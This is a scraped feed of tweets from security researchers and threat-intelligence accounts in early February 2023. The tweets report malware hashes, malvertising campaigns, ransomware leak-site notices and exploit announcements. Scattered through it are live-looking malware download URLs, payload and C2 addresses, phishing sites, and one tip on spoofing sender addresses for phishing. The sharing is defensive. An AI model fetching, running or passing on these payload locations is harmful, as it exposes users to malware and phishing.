malwrhunterteam: "miss.apk": 587d526df15a163ff2e610a848922af15d47ff6fab5a49d04269018737dc4f00 https://miss[.]navy/ -&gt; https://miss[.]navy/miss.apk https://t.co/zOoEbvmhx4 -- malwrhunterteam
malwrhunterteam: @deusrex 🤔 -- malwrhunterteam
Max_Mal_: @tosscoinwitcher @ian_kenefick I do a quick analysis on the small from VT. Maybe @ian_kenefick knows... -- Max_Mal_
vxunderground: Check the drip, dorks https://t.co/nKKyJIccbP -- vxunderground
TalosSecurity: We're not saying there's a pizza in your inbox... but the Threat Source Newsletter is hot-n-ready for you! https://t.co/W7Qw5Wn603 https://t.co/cJ5jA8RnPP -- TalosSecurity
424f424f: Am I crazy @_wald0 or did ya'll do a presto-changeo on Azurehound from PowerShell to Go? -- 424f424f
424f424f: https://t.co/5YyhbTuGPp https://t.co/V4JPhOKEwa -- 424f424f
424f424f: @vysecurity Ha thats good -- 424f424f
424f424f: @checkymander @Sony Why are you gaming from work? -- 424f424f
James_inthe_box: @PKELLEY2600 Awesome! -- James_inthe_box
James_inthe_box: Dear @discord mods (I'm lookin at you @BethesdaSupport and @Blizzard_Ent )...there's no way on GOD'S GREEN EARTH I'm giving that wretched platform my number. That is all. https://t.co/6yShXCPhQI -- James_inthe_box
malwrhunterteam: @MariaRusanova88 If you read his tweet, you can see he said the protected mode will be active only until today morning. -- malwrhunterteam
malwrhunterteam: 🤔 https://t.co/LVbBOL2LIH -- malwrhunterteam
Max_Mal_: @0xToxin I have a strong feeling that we will see some more LOLBins and interesting execution flows -- Max_Mal_
Max_Mal_: #Qakbot TAs keep pushing OneNote (.one) Spam Be aware now TA uses embedded .hta inside the .one for execution🚨 OneNote.exe &gt; mshta.exe &gt; #TTPs Potentially the same can be done by: .cmd.bat|.com|.js|.jse|.lnk|.pif|.vbe|.vbs|.wsf and mor -- Max_Mal_
pmelson: New wave last night, some of the metadata changed. Updated Yara rule here: https://t.co/f5rl5o9ZT9 https://t.co/ALaL8jwgbi -- pmelson
RansomwareNews: Group: royal Approx. Time: 2023-02-02 17:05:56.148260 Title: https://t.co/J84ijAtC2I -- RansomwareNews
cyb3rops: Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit - CVE-2023-21608 https://t.co/F2ZmgZHbGa -- cyb3rops
cyb3rops: This is a length contest: who has the shortest shell or download cradle? I started a collection of really short shells and download cradles PRs are welcome https://t.co/IgZzxgYQQF https://t.co/ZblrMTxYlQ -- cyb3rops
cyb3rops: @BushidoToken It has been slightly modified, yes https://t.co/sTnUzS1a91 -- cyb3rops
QuoIntelligence: #TrendMicro reports new #Ransomware #Mimic, aimed at Russian &amp; English speakers. It minimizes resources &amp; has more efficient execution. Geopolitical analysis of challenges AI brings to geopolitical competition, regulation and the -- QuoIntelligence
snovvcrash: @_nwodtuhs @_dirkjan @exploitph @SkelSec @ly4k_ @mpgn_x64 @_wald0 @podalirius_ @elad_shamir ☺️🤗 -- snovvcrash
blackorbird: #APT29 https://t.co/agDkdxBvF2 https://t.co/qoi8vsjan8 https://t.co/szzEMN2uuR -- blackorbird
cyb3rops: @BushidoToken 2nd one 06abc46d5dbd012b170c97d142c6b679183159197e9d3f6a76ba5e5abf999725 -- cyb3rops
cyb3rops: @BushidoToken &lt; proud https://t.co/tpRq46cuU8 -- cyb3rops
cyb3rops: @virustotal Can't find the SecureZeroMemory function being used in the ManageEngine filter DLL but I just quickly searched for it in hex editor - I don't want to know more about it. The truth could be disturbing. https://t.co/CDEJt7yTRU https:/ -- cyb3rops
cyb3rops: 1. Oh, okay, these functions are exported in password filter DLLs 2. Idea: let's write a YARA rule that looks for unsigned password filters 3. But let's first verify this using @virustotal https://t.co/ItnVtpJeOl 4. Oh, for f***s sake 🧵 https:/ -- cyb3rops
IntezerLabs: Looking to automate triage and investigation of alerts from Microsoft Defender for Endpoint? Join us for our next webinar on Wednesday Feb. 15th to see how Intezer connects with Defender to tune out false positives and save time responding -- IntezerLabs
James_inthe_box: A csv formatted list of #malspam campaigns that crossed my path in January to include hash, c2, subject, and email exfil addresses: https://t.co/08J0mjpEtA #retrohunt -- James_inthe_box
KorbenD_Intel: @ScumBots #CobaltStrike confirmed 27.122.56[.]137 /avatars.css -- KorbenD_Intel
kyleehmke: Domain registered in October 2022 by a "Fairness First PAC" and now most likely administered by Parscale / Nucleus: fairnessfirst[.]us https://t.co/ebSYz6lhx6 -- kyleehmke
lazyactivist192: AmanVPN IOCs are here: https://t.co/S1sguK27SK @JRoosen @Cryptolaemus1 @malwrhunterteam @gorimpthon -- lazyactivist192
lazyactivist192: Hey folks, seeing the following active #FakeBat ads: CPUZ Lightshot Paint .net Also was able to identify the following software being leveraged but no ads (hattip @gorimpthon for finding most of them) qBitTorrent UltraISO GPG4Windows Aid -- lazyactivist192
vxunderground: @ldklinux What kind of research is being conducted that would trigger an EDR/SOC event? -- vxunderground
vxunderground: @alpha_convert Sorry - you go to UPENN, not PSU. That is a mistake on our part =D Either way, the point remains the same. tl;dr people criticizing academia for being disconnected from the real-world, or something, blah blah blah, whatever -- vxunderground
vxunderground: @alpha_convert Do not be silly. An EDR is put in place by network security teams to detect, monitor, or prevent malicious activity on a network. For example, your university was subject to a large-scale data breach in 2015. An EDR could hav -- vxunderground
vxunderground: In this Twitter thread there are multiple individuals with PhD's in Computer Science that do not know what an EDR is. It is profoundly interesting. Students representing: - Penn - Carnegie Mellon - Georgia Tech - Cornell - Michigan U - Iow -- vxunderground
vxunderground: @PShef5 @abuse_ch They fixed the issue =D https://t.co/zkntVhg3NX -- vxunderground
vxunderground: @TheAndersPaul The timezone that tablet currently has -- vxunderground
vxunderground: For those curious: North Korea used to sell these tablets. They stopped selling them to foreigners in approx. 2014. We were able to find a person who owned a mint-condition, never used, Samjiyon Tablet. We purchased it off of them. -- vxunderground
vxunderground: @j2k3k An auction =D -- vxunderground
vxunderground: @Pparkjaewoo An auction =D -- vxunderground
424f424f: I guess @zelcore_io is optomistic about #FTX #FTXUS :P https://t.co/yWSEWESwDe -- 424f424f
58_158_177_102: https://t.co/91hQ03pc0V 同じ問題意識 すでに攻撃者にはEDRはスタンダードの管理策 -- 58_158_177_102
58_158_177_102: 昼らー 洗濯機が壊れたかも。乗っていた電車が人身。飲み過ぎた。 今日は大変 https://t.co/33V4BnXO5J -- 58_158_177_102
58_158_177_102: @PINKSAWTOOTH 酔っ払って迷惑防止条例違反 -- 58_158_177_102
58_158_177_102: @PINKSAWTOOTH 違うとこでパクられるに賭けるよ -- 58_158_177_102
58_158_177_102: 機能名が同じでも中身は同じではない https://t.co/hl9MX62GTh -- 58_158_177_102
anyrun_app: Another day, another #OneNote maldoc! 📄 We're seeing growing OneNote #maldoc usage lately: crooks leverage different lures, such as #Office365 and blurred documents. Check a fresh "Legal Notice" maldoc with #Redline as the payload 👇 https:// -- anyrun_app
campuscodi: The most glorious bullet in your foot I have ever seen https://t.co/hAmRvBEKAe -- campuscodi
malwrhunterteam: "INVOICE - F230002030 - CHATYPTWTXG (02-Feb-23).img": 44cfd5c23f241ce082e5e374ae4fe511174c1a208fc958b987b0dc4a275e663c "INVOICE___F230002030___CHAT.LNK": 6b37e659593f1240578829cdbb6f5b7ce92de4ec407a0819570725514af57ff2 Next stage: https:/ -- malwrhunterteam
424f424f: @chvancooten Use it like every day. Wait until you hear about SSH VPN tunnelling ;) -- 424f424f
58_158_177_102: @gorimpthon 社会的にも二度と聞きたくない -- 58_158_177_102
Max_Mal_: @ian_kenefick https://t.co/X6qWS1yzbi -- Max_Mal_
Max_Mal_: #Qakbot MSI sample: https://t.co/WE8Bbm2fei -- Max_Mal_
Max_Mal_: #Qakbot Pushing MSI Fake TeamViewer 🚨 Exec flow #DFIR &amp; #TTPs: MSI &gt; [RPC] &gt; msiexec &gt; Rundll32 &gt; [injection target process] [+] Msiexec T1218.007 [+] Rundll32 T1218.011; export func: Updt [+] Process Injection T1055 [+] Loader -- Max_Mal_
RedDrip7: A #Ukrainian news-themed website in #Russia was attacked by #Mirai #Botnet with #DDoS method #udp_flood. Attack time: 2023-02-02 16:33:54 (UTC+8) Target IP: 185[.169.155.233, related domains: - www[.ukraine.ru - www[.ukraina.ru Mirai C&amp;C: 1 -- RedDrip7
RedDrip7: #Tinkoff, The 3rd largest bank in Russia was attacked by #Mirai #Botnet with #DDoS method #udp_flood. Attack time: 2023-02-02 16:02:46 (UTC+8) Target IP: 178[.248.236.218, related domain names: - www[.tinkoff.ru - www[.tcsbank.ru Mirai C&amp;C: -- RedDrip7
vxunderground: @_xpn_ @DaahtK @ellishlomo Bad, @ellishlomo, bad! https://t.co/edHMbHGfe9 -- vxunderground
vxunderground: @DaahtK @_xpn_ @ellishlomo who gets the stick? -- vxunderground
vxunderground: @_xpn_ @DaahtK @ellishlomo Bad DaahtKing, bad! https://t.co/dJ0PmqTePc -- vxunderground
vxunderground: @John_Fokker @RansomwareNews Ok, you've got good negotiating skills. If the cost is not outrageous we will continue the account so people can continue getting their ransomware news. -- vxunderground
vxunderground: Our @RansomwareNews's bot will be discontinued on Twitter. We have no intention on paying Twitter for basic API usage. tl;dr their anti-spam campaign stinks, it is going to kill some really cool Twitter accounts https://t.co/3VchhpY9Vc -- vxunderground
virusbtn: Elastic Security Labs researchers provide an update on the REF2924 intrusion set and related campaigns that link this adversary to the Winnti Group and ChamelGang, using third-party reporting and previously undisclosed incidents. https://t.co/98 -- virusbtn
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-02 08:58:19.992151 Title: https://t.co/LqLyHvmgwt -- RansomwareNews
anyrun_app: Malware News Digest for January 2023! 💻🔎 New threats alert, malicious packages, blank image attacks &amp; Google Ads phishing scams — just some of the things that have been happening in the world of cybersecurity this month. Check it out now -- anyrun_app
virusbtn: Proofpoint's Tommy Madjar, @cocaman, @joewise34, @selenalarson &amp; Chris Talib warn about the increasing use of Microsoft OneNote documents to deliver malware via email as multiple threat actors (such as TA577 &amp; TA570) start to use this de -- virusbtn
virusbtn: Trend Micro's Mohamed Fahmy, Sherif Magdy &amp; Mahmoud Zohdy identified a new backdoor used by APT34 to target organizations in the Middle East for espionage. The campaign abuses compromised email accounts to send stolen data to external mail a -- virusbtn
58_158_177_102: 折角なので理由も ・EDRの管理画面に入られて全端末のEDR機能停められた ・EDRのクラウド側の管理画面は多要素だったが、管理者端末が乗っ取られ、さらに管理画面に繋ぎっぱなしだったため(以下、同上) ・脆弱性によって不正に取得されたツールをEDRが停めたけれど管理者がリリースしてしまい。。。 https://t.co/moGrwlYZZt -- 58_158_177_102
58_158_177_102: @nekono_naha (実インシデントから追加) ・クラウド含め管理コンソールのログインは多要素 ・管理コンソールのセッションは運用に支障がない範囲で短くし繋ぎっぱなしを極力しない ・ブロックしたファイルやプロセスをリリースする時は必ず専門家が確認する -- 58_158_177_102
cyb3rops: follow up on this ^ tweet https://t.co/JFM4CJHKwU -- cyb3rops
DissectMalware: @Hellfire0x01 Just sent you a DM -- DissectMalware
JAMESWT_MHT: dipartimento_investigazione_criminale@outlook.]com -- JAMESWT_MHT
RansomwareNews: Group: royal Approx. Time: 2023-02-02 06:53:56.619137 Title: https://t.co/sHSqqOFiw3 -- RansomwareNews
vxunderground: @_xpn_ Example 4: PlugX malware doing cool masquerading on USB devices. Maybe not super novel, but an interesting array of techniques https://t.co/8bEmK8OMF3 -- vxunderground
vxunderground: @_xpn_ Example 3: Using IUIAutomation for monitoring, or hijacking, the Chrome browser. This code lets you monitor websites the victim visits, or redirects them based on the factors you define https://t.co/JzhzHrbhvn -- vxunderground
vxunderground: @_xpn_ Example 2: Unusual, or undocumented, IOCTL's findings from @0gtweet. In this example it shows how to use them for random number generation https://t.co/TUZPzrjbum -- vxunderground
vxunderground: @_xpn_ Example 1: Wra7th's FlavorTown shellcode execution project. Last updated 3 days ago. It has lots of unusual ways to self-execute shellcode! https://t.co/IvYxiKG7GF -- vxunderground
vxunderground: @_xpn_ We see lots of innovation - however things such as C2s, or more syscall papers, seem to get the most attention, drowning out novel research. tl;dr Flashy marketing tactics and buzz words get the most attention. -- vxunderground
DrunkBinary: @generativist Remember the first time you heard Mr. Brightside while watching The OC season 2 -- DrunkBinary
lazyactivist192: This feels like a parody https://t.co/fhoYw9yLvp -- lazyactivist192
mrd0x: @n00py1 I mentioned an alternative way of doing this in one of my previous posts. Combine that with BITB and it becomes pretty realistic. https://t.co/hHkYn7w0ki -- mrd0x
RansomwareNews: Group: alphv Approx. Time: 2023-02-02 04:54:37.156222 Title: SOTO Consulting Engineers -- RansomwareNews
vxunderground: .@abuse_ch has taken after us - they also put out content with typographical errors. 🥰 awarness https://t.co/lX1Ydh2RkA -- vxunderground
vxunderground: @cyberNKOTB We have it labeled under Blackcat Ransomware https://t.co/ZezUNgW1qn -- vxunderground
424f424f: @cstraynor @Jconnfilm HAHAHA -- 424f424f
424f424f: @W_1White @zelcore_io It shows up in one of my Zel wallets but not a fresh install. odd -- 424f424f
424f424f: @OakAndClay https://t.co/zG6hmT7h5F -- 424f424f
424f424f: I'm starting to get the research itch... https://t.co/zkvJKhvEtD -- 424f424f
blackorbird: #APT29 https://t.co/tRjTy1spMj ref: https://t.co/8M5GBR8eiQ https://t.co/FVlUUtaTYS -- blackorbird
424f424f: @W_1White @zelcore_io I don't see it as an option here ? Just me? https://t.co/7nADqOsaFC -- 424f424f
424f424f: @EanMeyer I missed this? https://t.co/MyyNl4yxXH -- 424f424f
424f424f: @roobixx Inbound bro hug.. https://t.co/5GSInU7ezN -- 424f424f
424f424f: @zelcore_io Was $KDA delisted from the wallet app? -- 424f424f
58_158_177_102: 教育プログラムの建付けから、ジュニア枠については初年度や二年目は期の途中で採用できる余裕がないような気がしているので、興味がある方はご連絡ください (連絡いただいた方には返信させていただきました。もし返信なければ、お手数ですが再度ご連絡ください) https://t.co/cZ3hVE58at -- 58_158_177_102
RansomwareNews: Group: lockbit3 Approx. Time: 2023-02-02 01:23:35.041418 Title: https://t.co/xohnvbxkIe -- RansomwareNews
James_inthe_box: @pmelson Agreed :) -- James_inthe_box
James_inthe_box: @pmelson I don't think so. -- James_inthe_box
malwrhunterteam: @DanielGallagher Here are the numbers of January: https://t.co/i9e8KAr3f1 -- malwrhunterteam
malwrhunterteam: January's numbers are in, so let's take a look: Sunspot numbers: Predicted for January: 63,4 Predicted cycle maximum: 115,3 Observed January: 143,6 F10.7cm radio flux: Predicted for January: 100,4 Predicted cycle maximum: 135,8 Obs. Janua -- malwrhunterteam
malwrhunterteam: "sbi-kyc.apk": 5c9fb34f1f12a8fe9adf1a41bde6ce35eb379a9621f35d84c41d589e78f338ee From: https://sb1-kyc.web[.]app/sbi-kyc.apk https://t.co/V8Z7d4naTg -- malwrhunterteam
malwrhunterteam: @zakd @wdormann @discord @1ZRR4H @jiriatvirlab -- malwrhunterteam
malwrhunterteam: @zakd @wdormann @discord @1ZRR4H Okay, let us know about the progress. -- malwrhunterteam
pmelson: I think I'm going to keep my posting of technical writeups/walkthroughs just to the 🐘site. Not having to fight with character limits and recent submission flakiness makes it a lot smoother on my end. -- pmelson
pmelson: @James_inthe_box That's a nice change. -- pmelson
pmelson: Which reminds me, is cross linking still blocked? https://t.co/wgI8fhYvH1 -- pmelson
424f424f: @HackersCurator Thoughts on this piece? https://t.co/9hDqEhe67h -- 424f424f
inj3ct0r: #0day #Hikvision Remote Code Execution / #XSS / #SQLi #Injection #Vulnerabilities #RCE https://t.co/LQ2pXtThoV -- inj3ct0r
inj3ct0r: #0day #io_uring Same Type Object Reuse Privilege Escalation #Exploit #linux https://t.co/2iLdLzNKUk -- inj3ct0r
inj3ct0r: #0day #vmwgfx Driver File Descriptor Handling Privilege Escalation #Exploit https://t.co/5t7yxpqHuw -- inj3ct0r
inj3ct0r: #0day #OnlineEyewear Shop 1.0 #SQLi #Injection #Vulnerability https://t.co/xKh2JgDQqd -- inj3ct0r
James_inthe_box: @RolfRolles "Each class is $4,999 USD per student per week." Any scholarships or discounts for people just breaking into the industry? -- James_inthe_box
malwrhunterteam: 😂 https://t.co/qzwib8MLjo -- malwrhunterteam
malwrhunterteam: 😂 https://t.co/RtT93aSlGJ -- malwrhunterteam
malwrhunterteam: As the saying goes: fuck Google. https://t.co/PdXx22HPIk -- malwrhunterteam
malwrhunterteam: @wdormann @zakd @discord @1ZRR4H The point of the ad is exactly what he said there was no intention of... 🤷‍♂️ And their "app store" is some really good and useful thing, right? Some of the biggest name and/or most reputed AV companies ar -- malwrhunterteam
vxunderground: POV your schools been hit by ransomware Image via @f0wlsec https://t.co/iQJxYUch6Y -- vxunderground
vxunderground: @f0wlsec Hahahahahaha -- vxunderground
abuse_ch: Next round, this time rogue ads for Mozilla Thunderbird 👀🔍 🌐 thuunderbils .space 🌐 us-thunderbird-soft .top Serving the same payload #IcedID: 👉 https://t.co/WEHUMvOUTz @GoogleAdsDE @GoogleAds Could you please investigate the rise of rogue ads -- abuse_ch
abuse_ch: @James_inthe_box Thanks! There's even more: https://t.co/7euJ0htKFc https://t.co/zlZpKrYBwb -- abuse_ch
abuse_ch: A search for Microsoft Teams on Google currently leads to a rogue ad spreading #IcedID 🔍👀 Payload domains: 🌐 teams-mss .online 🌐 mlcrosofteams-us .top Payload: 📄 https://t.co/uC6kY3tXBT IcedID C2: 🔥restorahlith .com @tucows Full list of IOC -- abuse_ch
Cyb3rWard0g: @Ba4bes @BicepLang @erwin_staal Nice! 🙏 was the session recorded? Thank you for sharing your experience with Bicep 💪! -- Cyb3rWard0g
Hexacorn: @_xpn_ _xpn_+=Vitamin D3 😎 -- Hexacorn
James_inthe_box: @sh1shk0va @kaspersky Congratulations! -- James_inthe_box
James_inthe_box: @cocaman @JAMESWT_MHT @doc_guard @guelfoweb @VirITeXplorer @reecdeep @malwrhunterteam @pr0xylife @struppigel @0xToxin @StopMalvertisin @sugimu_sec @ffforward Lil more info: https://t.co/4sRTnQfYoO https://t.co/9RuFiZqUcz -- James_inthe_box
James_inthe_box: @JAMESWT_MHT @doc_guard @guelfoweb @VirITeXplorer @reecdeep @malwrhunterteam @pr0xylife @struppigel @0xToxin @StopMalvertisin @sugimu_sec @ffforward #qbot -- James_inthe_box
James_inthe_box: @Equuscyber @pr0xylife Seeing these as well. -- James_inthe_box
JAMESWT_MHT: more info https://t.co/evl2yF7FRL https://t.co/o0SJWO2Pao -- JAMESWT_MHT
JAMESWT_MHT: mal spam spread one note malware sample This is #Qakbot thanks to @pr0xylife @Max_Mal_ @James_inthe_box @cocaman .one malware attachment https://t.co/kiiUlXkzeH open.hta https://t.co/wpd51VSG2N &gt; 139.99.117.]17/68597.dat AnyRun https://t -- JAMESWT_MHT
KorbenD_Intel: JUST IN: Spike in Google Ads related to ChatGPT mobile apps https://t.co/zC836vHyZv -- KorbenD_Intel
malwrhunterteam: https://dockkerf[.]site/ Doing a Google search right now for "docker" gives this ad... Obviously as expected, not the real @Docker. cc @1ZRR4H @wdormann https://t.co/4lDfSBXCwa -- malwrhunterteam
malwrhunterteam: @abuse_ch @GoogleAdsDE @GoogleAds https://t.co/pQXbNrBAGU -- malwrhunterteam
malwrhunterteam: https://bbasecaupe[.]space/ Doing a Google search right now for "basecamp" gives this ad... Obviously as expected, not the real @basecamp. cc @1ZRR4H @wdormann https://t.co/WDQZqCsYJW -- malwrhunterteam
malwrhunterteam: https://thuunderbils[.]space/ Doing a Google search right now for "thunderbird" gives this ad... Obviously as expected, not the real @mozthunderbird. cc @1ZRR4H @wdormann https://t.co/vtFO9nGPgz -- malwrhunterteam
Max_Mal_: @JAMESWT_MHT @doc_guard @guelfoweb @VirITeXplorer @reecdeep @malwrhunterteam @pr0xylife @struppigel @0xToxin @StopMalvertisin @sugimu_sec @ffforward #Qakbot 🦆🦆🦆 https://t.co/SR9tQysKJ6 -- Max_Mal_
Max_Mal_: @JAMESWT_MHT https://t.co/CcV3mDuWOz -- Max_Mal_
RansomwareNews: Group: bianlian Approx. Time: 2023-02-01 18:53:44.324813 Title: N** ****** -- RansomwareNews
vxunderground: Nantucket public schools in Massachusetts, United States of America, are closed due a ransomware attack. Imagine being informed class is cancelled today because some nerds are extorting your school https://t.co/zp4SkSbAif -- vxunderground
vxunderground: due to a*** It's another typo. -- vxunderground
424f424f: @Chapman Hahaha -- 424f424f
424f424f: @jorgeorchilles Lando hit one last year. Not sure about Piastri -- 424f424f
424f424f: @realdannydorko @jorgeorchilles Yeah, definitely tuning my fantasy team -- 424f424f
424f424f: Yo, @bsdbandit .. https://t.co/qveoWvBHAK -- 424f424f
JAMESWT_MHT: @idclickthat @Zoom @Hostinger @1ZRR4H @malwrhunterteam @0xDanielLopez @ULTRAFRAUD @0xToxin @Cryptolaemus1 sample looks like geuine -- JAMESWT_MHT
JAMESWT_MHT: @signorina37H @CodiceSette @sonoclaudio @WebMarkeThink @illegalFawn @malwrhunterteam @FBussoletti ma non serve è tutto pronto qui cosa succede se rispondi https://t.co/OBERKtH696 https://t.co/q3ENTbjpSd -- JAMESWT_MHT
KorbenD_Intel: #CobaltStrike audelr[.]com uranustechsolution[.]com 0xx3[.]kaspenskyupdates[.]com -- KorbenD_Intel
malwrhunterteam: So, a few months later, comes this research from @SecurityJoes: https://t.co/w17cbRBDK5 Good to see @IdoNaor1's company is another of the (sadly, still not much) ones that are happy to add references to other people/researchers/etc... htt -- malwrhunterteam
SBousseaden: nice find! vs Elastic - 4 alert: 2 behavior, 1 memory signature and shellcode detection :) https://t.co/9YIhTt379V https://t.co/BCxWB5AwmJ -- SBousseaden
vxunderground: You nerds have no idea whats coming, but it wouldn't be possible without the support we have received from all of you. We are about to do something we've wanted to do forever, but were unable to ... until now:) Stay tuned🥰 -- vxunderground
vxunderground: Our magnum opus is approaching an ideal state. - New staff member on-boarded - 75% of all papers have an assigned date of release - New papers coming! - Est. 50,000+ new malware samples received DAILY Thanks to donors and public support w -- vxunderground
vxunderground: @vmiss33 I guess it's a Barbie kind of day. -- vxunderground
424f424f: @vysecurity Here is a trick. Try your from address something the target uses like salesforce or service-now ;) -- 424f424f
cyb3rops: Xdr33 variant of CIA's HIVE attack kit surfaced on VT Report https://t.co/6j8pY0YuqE Sample https://t.co/6QoYk0KK1S -- cyb3rops
Cyb3rWard0g: @DrAzureAD @BlackHatEvents 😂⏰ no promises 😂😴 https://t.co/GTJqDL9E8D -- Cyb3rWard0g
James_inthe_box: Active #qbot at: http://49.50.84[.]121/84675.dat -- James_inthe_box
lazyactivist192: @da5ch0 yeah, its problematic. I sadly don't have an easy answer. Adblock helps with ads, but for non-ads, its a lot harder. Especially when some of these malicious installers will install the legitimate software too. -- lazyactivist192
lazyactivist192: @da5ch0 A lot of these are malicious ads, so I've been warning everyone I know to not click the ad. Please for the love of all that is holy don't click the ad. Back out if you think you clicked the ad and try again -- lazyactivist192
luc4m: @pmelson but he/she got an IV 😎 https://t.co/v6UfdIphMk -- luc4m
pmelson: @luc4m https://t.co/bOE05SJ2ro -- pmelson
TheDFIRReport: According to this poll, 36% of red teamers use ShareFinder on engagements. You'll see comments like "we dont use that tool, but we use other tools to accomplish the same goal" This is why we focus on behaviors! Thanks to the red teamers -- TheDFIRReport
vxunderground: @solminingpunk No, their page links to the Lockbit hash tag. They do not have a Twitter. -- vxunderground
424f424f: @DrAzureAD @getwired Only if it requires an E5 license! -- 424f424f
424f424f: @NathanMcNulty Sounds like my typical Monday... -- 424f424f
JAMESWT_MHT: Dopo 8 anni ho reinstallato sul mio computer di lavoro Windows 10..😱😱😱 Avevo un software che se reinstallato non avrei più potuto attivare... oggi dismesso Caricamento di prima 30 secondi per arrivare al desktop Adesso 6 secondi 😅😅😅 -- JAMESWT_MHT
JCyberSec_: Another example of an AU Gov Phishing kit 🇦🇺🏦 🌐hxxps://atorefunding.line.pm/ret/MyGovATO ☎️+61480447518 All banks targeted are displayed in the image💰 #KITIntel🔍 This is a puppeteer/live #phishing site with a threat actor backend admin pane -- JCyberSec_
lazyactivist192: Hey folks! Seeing some #FakeBat campaigns for the following software: Cpu-Z Lightshot Paint .net IOCs for each: https://t.co/3Eb2LfQXoK @JRoosen @Cryptolaemus1 @malwrhunterteam @1ZRR4H https://t.co/u7YkfN8duL -- lazyactivist192
malwrhunterteam: So we have a name for these recent campaigns that DEV-0569 is doing using Google Ads: FakeBat. https://t.co/LReKdKoSZT -- malwrhunterteam
vxunderground: 1. According to Lockbit ransomware group, they announced on various forums Lockbit Green is based off of the Conti source code leak 2. It appears that Lockbit monitors Twitter https://t.co/nwxh95aLbM -- vxunderground
vxunderground: Image courtesy of @bellafusari1 https://t.co/ln0MlcyfBR -- vxunderground
cyb3rops: @binalyze I see. Well, you're doing a really good PR job. I would've answered something very similar. I'll watch your future activities more closely and comment on it earlier to point out deficiencies in your "market research". -- cyb3rops
JCyberSec_: Here is another thread on the same TTP https://t.co/ApPpYBJs4z -- JCyberSec_
JCyberSec_: Google sheets being abused for scams once again🚨 ⚡Using Google scripts as a redirector which shows a fake CAPTCHA image 🪙Leads to a fake bitcoin site 🌐hxxps://script.google.com/macros/s/AKfy... 🌐hxxps://ussigle.com/1TyJxcvs 🌐hxxps://bons-sys -- JCyberSec_
malwrhunterteam: 🤔 😂 https://t.co/DfUldlm17e -- malwrhunterteam
virusbtn: Fortinet's Xiaopeng Zhang analyses recently captured Excel documents in the Microsoft OLE Compound File format that contain malicious VBA Macros from a campaign that cryptojacks systems to mine for Monero (XMR) cryptocurrency. https://t.co/27egO -- virusbtn
virusbtn: Researchers from Palo Alto's Unit 42 team discuss a machine learning pipeline they’ve built around memory-based artifacts from their sandbox. This approach helps to boost detection accuracy against malware using a variety of different evasion te -- virusbtn
campuscodi: Also: -Cybercrime job ads spiked at the start of the pandemic -MSFT removes malicious OAuth apps that got verified status -Vladislav Klyushin trial begins -Japan holds ransomware drill ahead of G7 summit -Ireland starts spyware investigation -- campuscodi
campuscodi: Plus: -XSSHunter has new home -UK NCSC has retired Logging Made Easy -Metasploit 6.3 out with new Kerberos and Active Directory attack modules -Sh1mmer exploit lets you unenroll Chromebooks -VMware vRealize Log Insight PoC released -Sandworm' -- campuscodi
campuscodi: Newsletter (https://t.co/P8WFkLrNDt) and podcast (https://t.co/jWvcqLo5w0) are out: -Google discloses breach of its Fi cell service -GitHub discloses security breach; -Microsoft is tracking more than 100 ransomware gangs active today; -PoS ma -- campuscodi
cyb3rops: @BigNightlyBird @OmegaScouter Yeah, they basically copied most of what we do and then even claim that they're the only ones doing it I hate that -- cyb3rops
cyb3rops: Reading @rapid7's analysis on CVE-2021-22005 affecting VMWare vCenter &amp; the new RCE vuln in VMWare vRealize I think its a good idea to point to my auditd config, which includes rules to monitor for crond modifications Analysis https://t.co/ -- cyb3rops
Cyb3rWard0g: @DrAzureAD Wowzers!! 🙈 thank you for sharing brother! 🙏 it means a lot! First @BlackHatEvents #BHEU 🇬🇧 talk! I guess #BHUSA next? 😁 we just have to do the 5k at 4am to avoid the heat 😂 https://t.co/PEM4xw489t -- Cyb3rWard0g
malwrhunterteam: 😂 https://t.co/zzvD6kUyOC -- malwrhunterteam
malwrhunterteam: https://gov-uk-payroll.web[.]app/ Page was saved from mail.mofa.[gov].kw domain... 😂 https://t.co/ltRci5bO0d -- malwrhunterteam
malwrhunterteam: @Chaitamaa_ Best would be if you go here and explain your problem in details: https://t.co/SNuSM3ZZgi Some of the experts will then help you. -- malwrhunterteam
malwrhunterteam: "Factura Vencida.lnk": efd7b5746d18a7fed5ad45b3e074da393c4975f8d20907a3e6fd352232f249ef Next stage: https://tequilamisorpresa[.]com/execution.php?tag=tribu @1ZRR4H https://t.co/VrElnI6Xnz -- malwrhunterteam
virusbtn: ESET has released its APT activity report for T3 2022: Russia-aligned APT groups continued to be particularly involved in operations targeting Ukraine, deploying destructive wipers and ransomware. https://t.co/Ic8MLzvDeA https://t.co/mOFRQBdB35 -- virusbtn
cyb3rops: @TheSarthis We do this since Sigma exists. And I created Sigma. So I don’t think that they can have been first. Maybe in a parallel reality. -- cyb3rops
Cyb3rWard0g: Very happy with the feedback from the community ❤️🙏 it was also an honor to share the stage with you hermano ❤️🙌 Keep up the great work! Let’s do it again 🛫🍻 https://t.co/GpEpKtDUHM -- Cyb3rWard0g
malwrhunterteam: https://exchange-scienceandtech-org.weebly[.]com/ https://t.co/JL7M04AUxq -- malwrhunterteam
RansomwareNews: Group: royal Approx. Time: 2023-02-01 06:58:27.697730 Title: https://t.co/Ekao06E2N0 -- RansomwareNews
RansomwareNews: Group: vicesociety Approx. Time: 2023-02-01 06:58:19.957738 Title: Guildford County School -- RansomwareNews
vxunderground: We've updated the vx-underground Malware Analysis collection. We've added 109 new malware analysis papers from 2013, 2014, 2018, 2019, 2021, 2022, and 2023. tl;dr lots of new stuff. Check it out here: https://t.co/Pm7umEpLLD https://t.co/ -- vxunderground
vxunderground: @_STD_ @petikvx https://t.co/GXHD34mxJ9 -- vxunderground
vxunderground: We've uploaded an additional 160,000 unique malware samples to vx-underground. They are volumes 0047 - 0054 of the InTheWild collection. Thanks to @petikvx for all the hard work. Check it out here: https://t.co/DzBr48gq43 https://t.co/bcV -- vxunderground
vxunderground: This week malware threat hunters have reported: - AgentTesla exfiltrating data using Discord webhooks - Ursnif using malicious .one files - Increased usage of Rhadamanthys stealer - Large increase in malvertising campaigns on Google https: -- vxunderground
blackorbird: Crypto Money Laundering: Four Exchange Deposit Addresses Received Over $1 Billion in Illicit Funds in 2022 https://t.co/GEi1O9IJq1 -- blackorbird
DrunkBinary: @rejectionking @arekfurt ^^^ -- DrunkBinary
DrunkBinary: @br4s1d4s @rejectionking Tagged the wrong person https://t.co/N3VdXTC1b3 -- DrunkBinary
DrunkBinary: @rejectionking @br4s1d4s ^^^ -- DrunkBinary
424f424f: @el_jasoon https://t.co/arv1gkWN4g -- 424f424f
